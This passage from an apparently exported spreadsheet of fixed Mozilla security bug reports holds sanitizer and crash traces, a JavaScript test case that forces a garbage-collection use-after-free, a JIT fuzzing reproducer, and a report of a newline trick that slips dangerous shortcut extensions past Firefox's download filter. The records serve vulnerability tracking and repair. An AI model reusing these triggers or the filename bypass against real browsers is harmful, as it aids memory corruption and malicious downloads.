    #23 0x7f0f6cd852ab in mozilla::dom::TimeoutManager::RunTimeout(mozilla::TimeStamp const&amp;, mozilla::TimeStamp const&amp;, bool) /builds/worker/checkouts/gecko/dom/base/TimeoutManager.cpp:903:44
    #24 0x7f0f6cd8443a in mozilla::dom::TimeoutExecutor::MaybeExecute() /builds/worker/checkouts/gecko/dom/base/TimeoutExecutor.cpp:179:11
    #25 0x7f0f6cd86b1b in mozilla::dom::TimeoutExecutor::Run() /builds/worker/checkouts/gecko/dom/base/TimeoutExecutor.cpp:234:5
    #26 0x7f0f69e266b2 in mozilla::ThrottledEventQueue::Inner::ExecuteRunnable() /builds/worker/checkouts/gecko/xpcom/threads/ThrottledEventQueue.cpp:254:22
    #27 0x7f0f69e1922f in mozilla::ThrottledEventQueue::Inner::Executor::Run() /builds/worker/checkouts/gecko/xpcom/threads/ThrottledEventQueue.cpp:81:15
    #28 0x7f0f69e1f6b2 in mozilla::RunnableTask::Run() /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:538:16
    #29 0x7f0f69ddfdbd in mozilla::TaskController::DoExecuteNextTaskOnlyMainThreadInternal(mozilla::detail::BaseAutoLock&lt;mozilla::Mutex&amp;&gt; const&amp;) /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:851:26
    #30 0x7f0f69ddcf28 in mozilla::TaskController::ExecuteNextTaskOnlyMainThreadInternal(mozilla::detail::BaseAutoLock&lt;mozilla::Mutex&amp;&gt; const&amp;) /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:683:15
    #31 0x7f0f69ddd650 in mozilla::TaskController::ProcessPendingMTTask(bool) /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:461:36
    #32 0x7f0f69e286e1 in operator() /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:187:37
    #33 0x7f0f69e286e1 in mozilla::detail::RunnableFunction&lt;mozilla::TaskController::InitializeInternal()::$_0&gt;::Run() /builds/worker/workspace/obj-build/dist/include/nsThreadUtils.h:531:5
    #34 0x7f0f69e01117 in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/checkouts/gecko/xpcom/threads/nsThread.cpp:1205:16
    #35 0x7f0f69e0b594 in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/checkouts/gecko/xpcom/threads/nsThreadUtils.cpp:465:10
    #36 0x7f0f6b414a88 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/worker/checkouts/gecko/ipc/glue/MessagePump.cpp:85:21
    #37 0x7f0f6b2b1361 in RunInternal /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:381:10
    #38 0x7f0f6b2b1361 in RunHandler /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:374:3
    #39 0x7f0f6b2b1361 in MessageLoop::Run() /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:356:3
    #40 0x7f0f71ea4717 in nsBaseAppShell::Run() /builds/worker/checkouts/gecko/widget/nsBaseAppShell.cpp:150:27
    #41 0x7f0f76d0f307 in XRE_RunAppShell() /builds/worker/checkouts/gecko/toolkit/xre/nsEmbedFunctions.cpp:880:20
    #42 0x7f0f6b2b1361 in RunInternal /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:381:10
    #43 0x7f0f6b2b1361 in RunHandler /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:374:3
    #44 0x7f0f6b2b1361 in MessageLoop::Run() /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:356:3
    #45 0x7f0f76d0e22c in XRE_InitChildProcess(int, char**, XREChildData const*) /builds/worker/checkouts/gecko/toolkit/xre/nsEmbedFunctions.cpp:739:34
    #46 0x55ffcf4a3825 in content_process_main(mozilla::Bootstrap*, int, char**) /builds/worker/checkouts/gecko/browser/app/../../ipc/contentproc/plugin-container.cpp:57:28
    #47 0x55ffcf4a3c77 in main /builds/worker/checkouts/gecko/browser/app/nsBrowserApp.cpp:359:18
    #48 0x7f0f8bd5428f  (/usr/lib/libc.so.6+0x2328f) (BuildId: 26c81e7e05ebaf40bac3523b7d76be0cd71fad82)
SUMMARY: AddressSanitizer: heap-use-after-free /builds/worker/fetches/sysroot-x86_64-linux-gnu/usr/lib/gcc/x86_64-linux-gnu/7.5.0/../../../../include/c++/7.5.0/bits/atomic_base.h:396:9 in load
Shadow bytes around the buggy address:
  0x0c068002c9a0: fd fd fd fd fa fa fd fd fd fd fa fa fd fd fd fd
  0x0c068002c9b0: fa fa fd fd fd fd fa fa fd fd fd fd fa fa fd fd
  0x0c068002c9c0: fd fd fa fa fd fd fd fd fa fa fd fd fd fd fa fa
  0x0c068002c9d0: fd fd fd fd fa fa fd fd fd fd fa fa fd fd fd fd
  0x0c068002c9e0: fa fa fd fd fd fd fa fa fd fd fd fd fa fa fd fd
=&gt;0x0c068002c9f0: fd[fd]fa fa fd fd fd fa fa fa fd fd fd fd fa fa
  0x0c068002ca00: 00 00 00 00 fa fa 00 00 00 fa fa fa fd fd fd fd
  0x0c068002ca10: fa fa fd fd fd fd fa fa fd fd fd fd fa fa 00 00
  0x0c068002ca20: 00 00 fa fa fd fd fd fd fa fa fd fd fd fd fa fa
  0x0c068002ca30: fd fd fd fa fa fa fd fd fd fa fa fa fd fd fd fd
  0x0c068002ca40: fa fa fd fd fd fa fa fa fd fd fd fd fa fa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521246==ABORTING
```
```cpp
==392594==ERROR: AddressSanitizer: heap-use-after-free on address 0x7f5a9ca5f800 at pc 0x7f5ab8c17612 bp 0x7f5aa3b50110 sp 0x7f5aa3b50108
WRITE of size 4 at 0x7f5a9ca5f800 thread T357
    #0 0x7f5ab8c17611 in ClearAndRetainStorage /builds/worker/workspace/obj-build/dist/include/nsTArray.h:1478:30
    #1 0x7f5ab8c17611 in nsTArray_Impl&lt;gfxSparseBitSet::Block, nsTArrayInfallibleAllocator&gt;::~nsTArray_Impl() /builds/worker/workspace/obj-build/dist/include/nsTArray.h:1031:7
    #2 0x7f5ab</t>
        </is>
      </c>
      <c r="X3491" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3492">
      <c r="A3492" t="n">
        <v>353165</v>
      </c>
      <c r="B3492" t="inlineStr">
        <is>
          <t>2006-09-18 08:29:07 -0700</t>
        </is>
      </c>
      <c r="C3492" t="inlineStr">
        <is>
          <t>GC hazard with xml_getMethod</t>
        </is>
      </c>
      <c r="D3492" t="inlineStr">
        <is>
          <t>2007-05-26 01:39:55 -0700</t>
        </is>
      </c>
      <c r="E3492" t="n">
        <v>1</v>
      </c>
      <c r="F3492" t="n">
        <v>1</v>
      </c>
      <c r="G3492" t="n">
        <v>3</v>
      </c>
      <c r="H3492" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3492" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3492" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K3492" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3492" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3492" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3492" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3492" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3492" t="inlineStr">
        <is>
          <t>[sg:critical?]</t>
        </is>
      </c>
      <c r="Q3492" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3492" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3492" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3492" t="n">
        <v>1</v>
      </c>
      <c r="U3492" t="n">
        <v>0</v>
      </c>
      <c r="V3492" t="n">
        <v>26</v>
      </c>
      <c r="W3492" t="inlineStr">
        <is>
          <t>Consider the following example:
var set = new XML('&lt;a&gt;&lt;b&gt;text&lt;/b&gt;&lt;/a&gt;').children('b');
var counter = 0;
Object.prototype.unrooter getter = function() {
  ++counter;
  if (counter == 5) {
    set[0] = new XML('&lt;c/&gt;');
    if (typeof gc == "function") { 
      gc();
      var tmp = Math.sqrt(2), tmp2;
      for (i = 0; i != 50000; ++i)
        tmp2 = tmp / 2;
    }
  }
  return undefined;
}
set.unrooter();
Currently it crashes when accessing GC-ed xml object. This happens because xml_getMethod does not root the first child of XML-list when it searches for a method there. The script exploits it defining a getter in Object.prototype that at the right moment removes the child from the list cutting all its roots. Thus the following forced GC collects the child leading to a crash during toString conversion of the child.</t>
        </is>
      </c>
      <c r="X3492" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3493">
      <c r="A3493" t="n">
        <v>1234280</v>
      </c>
      <c r="B3493" t="inlineStr">
        <is>
          <t>2015-12-21 10:43:07 -0800</t>
        </is>
      </c>
      <c r="C3493" t="inlineStr">
        <is>
          <t>Assertion failure: aIndex &lt; mLength, at ../../dist/include/mozilla/Vector.h:451 with OOM</t>
        </is>
      </c>
      <c r="D3493" t="inlineStr">
        <is>
          <t>2016-09-22 14:41:42 -0700</t>
        </is>
      </c>
      <c r="E3493" t="n">
        <v>1</v>
      </c>
      <c r="F3493" t="n">
        <v>1</v>
      </c>
      <c r="G3493" t="n">
        <v>3</v>
      </c>
      <c r="H3493" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3493" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3493" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K3493" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3493" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3493" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N3493" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3493" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3493" t="inlineStr">
        <is>
          <t>[jsbugmon:update][adv-main44+][adv-esr38.6+]</t>
        </is>
      </c>
      <c r="Q3493" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3493" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3493" t="inlineStr">
        <is>
          <t>mozilla46</t>
        </is>
      </c>
      <c r="T3493" t="n">
        <v>1</v>
      </c>
      <c r="U3493" t="n">
        <v>0</v>
      </c>
      <c r="V3493" t="n">
        <v>45</v>
      </c>
      <c r="W3493" t="inlineStr">
        <is>
          <t>The following testcase crashes on mozilla-central revision 388bdc46ba51 (build with --enable-optimize --enable-posix-nspr-emulation --enable-valgrind --enable-gczeal --target=i686-pc-linux-gnu --disable-tests --enable-debug, run with --fuzzing-safe --thread-count=2 --ion-eager):
oomTest(() =&gt; unescape({
    thisprops: gc() &amp;&amp; -new(function(x) {}).TestCase
}));
Backtrace:
Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread 0xf76cfb40 (LWP 51416)]
0x08466a1d in operator[] (aIndex=272, this=0xf577fc90) at ../../dist/include/mozilla/Vector.h:451
#0  0x08466a1d in operator[] (aIndex=272, this=0xf577fc90) at ../../dist/include/mozilla/Vector.h:451
#1  js::jit::CodeGeneratorShared::addCacheLocations (this=this@entry=0xf577f000, locs=..., numLocs=numLocs@entry=0xf76cefc0) at js/src/jit/shared/CodeGenerator-shared.cpp:1629
#2  0x082bc48f in js::jit::CodeGenerator::visitGetPropertyIC (this=0xf577f000, ool=ool@entry=0xf5779720, ic=...) at js/src/jit/CodeGenerator.cpp:8693
#3  0x082d4b18 in js::jit::OutOfLineUpdateCache::visitGetPropertyIC (this=0xf5779720, codegen=0xf577f000) at js/src/jit/CodeGenerator.cpp:105
#4  0x08367097 in js::jit::GetPropertyIC::accept (this=0xf7a6faa8, codegen=0xf577f000, visitor=0xf5779734) at js/src/jit/IonCaches.h:431
#5  0x0829504f in js::jit::CodeGenerator::visitOutOfLineCache (this=0xf577f000, ool=0xf5779720) at js/src/jit/CodeGenerator.cpp:146
#6  0x082c2988 in js::jit::OutOfLineCodeBase&lt;js::jit::CodeGenerator&gt;::generate (this=0xf5779720, codegen=0xf577f000) at js/src/jit/shared/CodeGenerator-shared.h:580
#7  0x08467b7c in js::jit::CodeGeneratorShared::generateOutOfLineCode (this=this@entry=0xf577f000) at js/src/jit/shared/CodeGenerator-shared.cpp:182
#8  0x0848dbcf in js::jit::CodeGeneratorX86Shared::generateOutOfLineCode (this=this@entry=0xf577f000) at js/src/jit/x86-shared/CodeGenerator-x86-shared.cpp:409
#9  0x082c2857 in js::jit::CodeGenerator::generate (this=this@entry=0xf577f000) at js/src/jit/CodeGenerator.cpp:8021
#10 0x082dcd3c in js::jit::GenerateCode (mir=mir@entry=0xf7aba100, lir=0xf7abd400) at js/src/jit/Ion.cpp:1974
#11 0x0832647f in js::jit::CompileBackEnd (mir=mir@entry=0xf7aba100) at js/src/jit/Ion.cpp:1996
#12 0x086942f8 in js::HelperThread::handleIonWorkload (this=this@entry=0xf7a40800) at js/src/vm/HelperThreads.cpp:1263
#13 0x08695d28 in js::HelperThread::threadLoop (this=0xf7a40800) at js/src/vm/HelperThreads.cpp:1581
#14 0x08715051 in nspr::Thread::ThreadRoutine (arg=0xf7a02180) at js/src/vm/PosixNSPR.cpp:45
#15 0xf7fb0f70 in start_thread (arg=0xf76cfb40) at pthread_create.c:312
#16 0xf7d7a4ce in clone () at ../sysdeps/unix/sysv/linux/i386/clone.S:129
eax	0x0	0
ebx	0x9803430	159396912
ecx	0xf7e3b88c	-136071028
edx	0x0	0
esi	0xf577f000	-176689152
edi	0xf7abba8c	-139740532
ebp	0xf76cef68	4151111528
esp	0xf76cef00	4151111424
eip	0x8466a1d &lt;js::jit::CodeGeneratorShared::addCacheLocations(js::jit::CacheLocationList const&amp;, unsigned int*)+701&gt;
=&gt; 0x8466a1d &lt;js::jit::CodeGeneratorShared::addCacheLocations(js::jit::CacheLocationList const&amp;, unsigned int*)+701&gt;:	movl   $0x1c3,0x0
   0x8466a27 &lt;js::jit::CodeGeneratorShared::addCacheLocations(js::jit::CacheLocationList const&amp;, unsigned int*)+711&gt;:	call   0x80fffc0 &lt;abort()&gt;
Marking this one s-s because the assertion indicates a length violation.</t>
        </is>
      </c>
      <c r="X3493" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3494">
      <c r="A3494" t="n">
        <v>375928</v>
      </c>
      <c r="B3494" t="inlineStr">
        <is>
          <t>2007-03-29 19:52:18 -0700</t>
        </is>
      </c>
      <c r="C3494" t="inlineStr">
        <is>
          <t>[@ nsTreeRange::Contains]</t>
        </is>
      </c>
      <c r="D3494" t="inlineStr">
        <is>
          <t>2011-06-13 10:01:45 -0700</t>
        </is>
      </c>
      <c r="E3494" t="n">
        <v>1</v>
      </c>
      <c r="F3494" t="n">
        <v>1</v>
      </c>
      <c r="G3494" t="n">
        <v>3</v>
      </c>
      <c r="H3494" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3494" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3494" t="inlineStr">
        <is>
          <t>XUL</t>
        </is>
      </c>
      <c r="K3494" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3494" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3494" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N3494" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3494" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3494" t="inlineStr">
        <is>
          <t>[sg:critical?]</t>
        </is>
      </c>
      <c r="Q3494" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3494" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3494" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3494" t="n">
        <v>1</v>
      </c>
      <c r="U3494" t="n">
        <v>0</v>
      </c>
      <c r="V3494" t="n">
        <v>12</v>
      </c>
      <c r="W3494" t="inlineStr">
        <is>
          <t>Date/Time:      2007-03-29 17:54:05.050 +0300
OS Version:     10.4.9 (Build 8P2137)
Report Version: 4
Command: firefox-bin
Path:    /Users/ui/Desktop/Minefield.app/Contents/MacOS/firefox-bin
Parent:  launchd [1]
Version: 3.0a4pre (3.0a4pre)
PID:    485
Thread: 0
Exception:  EXC_BAD_ACCESS (0x0001)
Codes:      KERN_INVALID_ADDRESS (0x0001) at 0x42b4000c
Thread 0 Crashed:
0   org.mozilla.firefox 	0x00823d8b nsTreeRange::Contains(int) + 9
1   org.mozilla.firefox 	0x0070603d nsTreeSelection::SelectCallback(nsITimer*, void*) + 235
2   org.mozilla.firefox 	0x005d488b nsTreeBodyFrame::PrefillPropertyArray(int, nsTreeColumn*) + 221
3   org.mozilla.firefox 	0x005d8a0e nsTreeBodyFrame::PaintRow(int, nsRect const&amp;, nsPresContext*, nsIRenderingContext&amp;, nsRect const&amp;, nsPoint) + 64
4   org.mozilla.firefox 	0x005d94a7 nsTreeBodyFrame::PaintTreeBody(nsIRenderingContext&amp;, nsRect const&amp;, nsPoint) + 1165
5   org.mozilla.firefox 	0x005d94ec nsTreeBodyFrame::PaintTreeBody(nsIRenderingContext&amp;, nsRect const&amp;, nsPoint) + 1234
6   org.mozilla.firefox 	0x007ec62f nsDisplayGeneric::Paint(nsDisplayListBuilder*, nsIRenderingContext*, nsRect const&amp;) + 71
7   org.mozilla.firefox 	0x003ae429 nsDisplayList::Paint(nsDisplayListBuilder*, nsIRenderingContext*, nsRect const&amp;) const + 47
8   org.mozilla.firefox 	0x003ae4c1 nsDisplayClip::Paint(nsDisplayListBuilder*, nsIRenderingContext*, nsRect const&amp;) + 119
9   org.mozilla.firefox 	0x003ae429 nsDisplayList::Paint(nsDisplayListBuilder*, nsIRenderingContext*, nsRect const&amp;) const + 47
10  org.mozilla.firefox 	0x00385b7f nsLayoutUtils::PaintFrame(nsIRenderingContext*, nsIFrame*, nsRegion const&amp;, unsigned) + 425
11  org.mozilla.firefox 	0x001242f6 nsIPresShell::RemoveWeakFrame(nsWeakFrame*) + 504
12  org.mozilla.firefox 	0x001b7ad8 nsViewManager::RenderViews(nsView*, nsIRenderingContext&amp;, nsRegion const&amp;, nsIDrawingSurface*) + 232
13  org.mozilla.firefox 	0x001b7daf nsViewManager::Refresh(nsView*, nsIRenderingContext*, nsIRegion*, unsigned) + 695
14  org.mozilla.firefox 	0x001b90f5 nsViewManager::FlushPendingInvalidates() + 3035
15  org.mozilla.firefox 	0x003669b2 nsView::LoadWidget(nsID const&amp;) + 188
16  org.mozilla.firefox 	0x00268a84 nsChildView::~nsChildView [in-charge deleting]() + 2518
17  org.mozilla.firefox 	0x00267788 nsChildView::DispatchWindowEvent(nsGUIEvent&amp;) + 34
18  org.mozilla.firefox 	0x0026c756 nsChildView::ReportMoveEvent() + 1594
19  com.apple.AppKit    	0x932e33b1 -[NSView _drawRect:clip:] + 3228
20  com.apple.AppKit    	0x932e1893 -[NSView _recursiveDisplayRectIfNeededIgnoringOpacity:isVisibleRect:rectIsVisibleRectForView:topView:] + 1273
21  com.apple.AppKit    	0x932e2041 -[NSView _recursiveDisplayRectIfNeededIgnoringOpacity:isVisibleRect:rectIsVisibleRectForView:topView:] + 3239
22  com.apple.AppKit    	0x932e0362 -[NSView _displayRectIgnoringOpacity:isVisibleRect:rectIsVisibleRectForView:] + 523
23  com.apple.AppKit    	0x932dfc8e -[NSView displayIfNeeded] + 439
24  org.mozilla.firefox 	0x0026524b nsChildView::OnPaint(nsPaintEvent&amp;) + 39
25  org.mozilla.firefox 	0x001b5959 nsViewManager::UpdateWidgetsForView(nsView*) + 35
26  org.mozilla.firefox 	0x001b59a8 nsViewManager::UpdateWidgetsForView(nsView*) + 114
27  org.mozilla.firefox 	0x001b55db nsViewManager::GetAbsoluteRect(nsView*, nsRect const&amp;, nsRect&amp;) + 213
28  org.mozilla.firefox 	0x001b7932 nsViewManager::UpdateWidgetArea(nsView*, nsRegion const&amp;, nsView*) + 1506
29  org.mozilla.firefox 	0x00369e30 nsIFrame::InvalidateRoot(nsRect const&amp;, int, int, int) + 104
30  org.mozilla.firefox 	0x005d9e7e ViewportFrame::InvalidateInternal(nsRect const&amp;, int, int, nsIFrame*, int) + 144
31  org.mozilla.firefox 	0x0036a31b nsIFrame::Invalidate(nsRect const&amp;, int) + 121
32  org.mozilla.firefox 	0x005d0d88 nsTreeBodyFrame::GetImageSourceRect(nsStyleContext*, int, imgIContainer*) + 302
33  org.mozilla.firefox 	0x0070613e nsTreeSelection::SelectCallback(nsITimer*, void*) + 492
34  org.mozilla.firefox 	0x00706c15 nsTreeSelection::~nsTreeSelection [in-charge]() + 2383
35  libxpcom_core.dylib 	0x00df3ed1 NS_InvokeByIndex + 81
36  org.mozilla.firefox 	0x0034523e XPCWrappedNative::CallMethod(XPCCallContext&amp;, XPCWrappedNative::CallMode) + 738
37  org.mozilla.firefox 	0x00335553 XPC_WN_CallMethod(JSContext*, JSObject*, unsigned, long*, long*) + 261
38  libmozjs.dylib      	0x00d41805 js_Invoke + 790
39  libmozjs.dylib      	0x00d35f2c js_Interpret + 3773
40  libmozjs.dylib      	0x00d41d96 js_Invoke + 2215
41  libmozjs.dylib      	0x00d4225c js_InternalInvoke + 146
42  libmozjs.dylib      	0x00d09e27 JS_CallFunctionValue + 62
43  org.mozilla.firefox 	0x0042338a nsJSContext::CallEventHandler(nsISupports*, void*, void*, nsIArray*, nsIVariant**) + 624
44  org.mozilla.firefox 	0x0045d512 nsJSEventListener::~nsJSEventListener [in-charge deleting]() + 570
45  org.mozilla.firefox 	0x00622b99 nsXBLPrototypeHandler::ExecuteHandler(nsIDOMEventReceiver*, nsIDOMEvent*) + 1539
46  org.mozilla.firefox 	0x00624eae nsXBLMouseEventHandler::EventMatched(nsIDOMEvent*) + 382
47  org.mozilla.firefox 	0x0019288f nsEventListenerManager::HandleEventSubType(nsListenerStruct*, nsIDOMEventListener*, nsIDOMEvent*, nsISupports*, unsigned) + 75
48  org.mozilla.firefox 	0x0019384e nsEventListenerManager::FixContextMenuEvent(nsPresContext*, nsISupports*, nsEvent*, nsIDOMEvent**) + 1462
49  org.mozilla.firefox 	0x003bdf45 nsEventTargetChainItem::HandleEvent(nsEventChainPostVisitor&amp;, unsigned) + 129
50  org.mozilla.firefox 	0x003be14b nsEventTargetChainItem::HandleEventTargetChain(nsEventChainPostVisitor&amp;, unsigned, nsDispatchingCallback*) + 487
51  org.mozilla.firefox 	0x003be9a1 nsEventDispatcher::Dispatch(nsISupports*, nsPresContext*, nsEvent*, nsIDOMEvent*, nsEventStatus*, nsDispatchingCallback*) + 747
52  org.mozilla.firefox 	0x001273eb PresShell::HandleEventInternal(nsEvent*, nsIView*, nsEventStatus*) + 289
53  org.mozilla.firefox 	0x00128dea PresShell::RetargetEventToParent(nsGUIEvent*, nsEventStatus*) + 1024
54  org.mozilla.firefox 	0x001b62ef nsViewManager::HandleEvent(nsView*, nsPoint, nsGUIEvent*, int) + 71
55  org.mozilla.firefox 	0x001b8979 nsViewManager::FlushPendingInvalidates() + 1119
56  org.mozilla.firefox 	0x003669b2 nsView::LoadWidget(nsID const&amp;) + 188
57  org.mozilla.firefox 	0x00268a84 nsChildView::~nsChildView [in-charge deleting]() + 2518
58  org.mozilla.firefox 	0x00267788 nsChildView::DispatchWindowEvent(nsGUIEvent&amp;) + 34
59  org.mozilla.firefox 	0x0026a53b nsChildView::~nsChildView [in-charge]() + 5623
60  com.apple.AppKit    	0x93341be1 -[NSWindow sendEvent:] + 7377
61  com.apple.AppKit    	0x93333350 -[NSApplication sendEvent:] + 5023
62  com.apple.AppKit    	0x9325ddfe -[NSApplication run] + 547
63  org.mozilla.firefox 	0x002612e1 nsAppShell::ProcessNextNativeEvent(int) + 519
64  org.mozilla.firefox 	0x002cb70d nsAppStartup::AttemptingQuit(int) + 279
65  org.mozilla.firefox 	0x00006e36 XRE_main + 8100
66  org.mozilla.firefox 	0x00003298 main + 32
67  org.mozilla.firefox 	0x0000321e start + 270
68  org.mozilla.firefox 	0x00003139 start + 41</t>
        </is>
      </c>
      <c r="X3494" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3495">
      <c r="A3495" t="n">
        <v>1815062</v>
      </c>
      <c r="B3495" t="inlineStr">
        <is>
          <t>2023-02-04 07:27:43 -0800</t>
        </is>
      </c>
      <c r="C3495" t="inlineStr">
        <is>
          <t>url/local/lnk/scf .download filename manipulation can be bypassed by using final newline or other sanitized characters</t>
        </is>
      </c>
      <c r="D3495" t="inlineStr">
        <is>
          <t>2024-05-30 11:05:04 -0700</t>
        </is>
      </c>
      <c r="E3495" t="n">
        <v>1</v>
      </c>
      <c r="F3495" t="n">
        <v>1</v>
      </c>
      <c r="G3495" t="n">
        <v>2</v>
      </c>
      <c r="H3495" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I3495" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J3495" t="inlineStr">
        <is>
          <t>File Handling</t>
        </is>
      </c>
      <c r="K3495" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3495" t="inlineStr">
        <is>
          <t>Desktop</t>
        </is>
      </c>
      <c r="M3495" t="inlineStr">
        <is>
          <t>Windows</t>
        </is>
      </c>
      <c r="N3495" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3495" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3495" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?][post-critsmash-triage][adv-main112+][adv-esr102.10+]</t>
        </is>
      </c>
      <c r="Q3495" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3495" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S3495" t="inlineStr">
        <is>
          <t>112 Branch</t>
        </is>
      </c>
      <c r="T3495" t="n">
        <v>1</v>
      </c>
      <c r="U3495" t="n">
        <v>0</v>
      </c>
      <c r="V3495" t="n">
        <v>39</v>
      </c>
      <c r="W3495" t="inlineStr">
        <is>
          <t>Created attachment 9315984
poc.html
Firefox has implemented a security measure aimed at protecting its users by replacing the download of malicious shortcut extensions, such as .url, .lnk, .scf, .local, and others, with the ".download" extension. However, it has been discovered that an attackers can use special character to bypass this filter.
A similar issue has been previously reported by me in Mozilla's bug tracking system (https://bugzilla.mozilla.org/show_bug.cgi?id=1810143) and has recently been addressed in the latest beta version of Firefox (110.0).
After conducting thorough testing on the latest version of Firefox, it has been determined that all dangerous extensions can still be downloaded using this bypass, indicating a lack of a filter to prevent this vulnerability. 
I have provided a proof of concept (poc.html) file that downloads .url. Using the special character '\n' bypass, you can directly modify the fileName variable to test other dangerous extensions, including .scf, .lnk, and .local.
Note: This vulnerability is of a more severe nature, given the ability of not only .url extensions, but also .scf, .lnk, and .local extensions to be downloaded as well.
Solution: Block special characters.</t>
        </is>
      </c>
      <c r="X3495" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3496">
      <c r="A3496" t="n">
        <v>1249920</v>
      </c>
      <c r="B3496" t="inlineStr">
        <is>
          <t>2016-02-20 12:53:37 -0800</t>
        </is>
      </c>
      <c r="C3496" t="inlineStr">
        <is>
          <t>graphite2: heap-buffer-overflow read in [@graphite2::TtfUtil::CmapSubtable12Lookup] TtfUtil.cpp:1126</t>
        </is>
      </c>
      <c r="D3496" t="inlineStr">
        <is>
          <t>2016-09-22 14:47:43 -0700</t>
        </is>
      </c>
      <c r="E3496" t="n">
        <v>1</v>
      </c>
      <c r="F3496" t="n">
        <v>1</v>
      </c>
      <c r="G3496" t="n">
        <v>3</v>
      </c>
      <c r="H3496" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3496" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3496" t="inlineStr">
        <is>
          <t>Graphics: Text</t>
        </is>
      </c>
      <c r="K3496" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3496" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3496" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3496" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3496" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3496" t="inlineStr">
        <is>
          <t>[adv-main45+][adv-esr38.7+]</t>
        </is>
      </c>
      <c r="Q3496" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3496" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3496" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3496" t="n">
        <v>1</v>
      </c>
      <c r="U3496" t="n">
        <v>0</v>
      </c>
      <c r="V3496" t="n">
        <v>5</v>
      </c>
      <c r="W3496" t="inlineStr">
        <is>
          <t>Created attachment 8721699
call_stack.txt
This was found while fuzzing graphite2 (32bit) 2c04f1eda80803d75ff94e53e67c64f108af6d06
This test case only seems to work on a 32bit build.</t>
        </is>
      </c>
      <c r="X3496" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3497">
      <c r="A3497" t="n">
        <v>811055</v>
      </c>
